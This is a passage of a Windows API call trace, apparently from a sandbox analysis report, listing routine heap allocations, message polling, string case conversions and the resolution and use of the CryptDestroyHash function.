(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0209.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0209.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0209.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0209.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0209.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0209.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0209.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0209.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0209.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0209.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0209.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0209.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0209.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0209.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0209.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0209.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0209.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0209.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0209.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0209.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0209.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0209.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0209.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0209.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0209.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0209.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0209.333] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0209.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0209.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0209.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0209.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0209.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0209.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0209.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0209.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0209.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0209.335] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0209.335] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0209.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0209.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0209.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0209.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.335] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0209.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0209.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0209.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0209.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0209.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0209.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0209.336] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0209.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0209.336] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0209.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0209.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0209.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0209.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0209.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0209.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0209.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0209.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0209.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0209.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4a8 [0209.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0209.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaad8 [0209.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa808 [0209.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0209.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0209.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa550 [0209.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa700 [0209.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa60 [0209.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0209.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaf0 [0209.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0209.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0209.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9b8 [0209.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0209.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0209.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4d8 [0209.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0209.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa328 [0209.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa358 [0209.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0209.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8b0 [0209.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9d0 [0209.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0209.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0209.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0209.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0209.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0209.339] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0209.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaac0 [0209.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0209.339] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0209.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0209.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0209.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0209.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0209.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0209.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0209.340] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0209.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0209.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0209.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0209.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0209.340] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0209.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0209.340] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0209.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0209.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0209.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0209.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0209.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0209.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0209.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0209.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0209.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0209.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0209.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0209.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0209.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0209.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0209.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0209.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0209.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0209.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0209.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0209.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0209.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0209.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0209.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0209.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0209.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0209.342] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0209.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0209.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0209.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0209.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0209.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0209.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0209.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0209.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0209.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0209.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0209.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0209.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0209.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0209.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0209.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0209.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0209.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466db0 [0209.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466db0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0209.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0209.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0209.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0209.344] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0209.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0209.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0209.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0209.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0209.344] CryptDestroyHash (hHash=0xaa5820) returned 1 [0209.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0209.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0209.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0209.345] 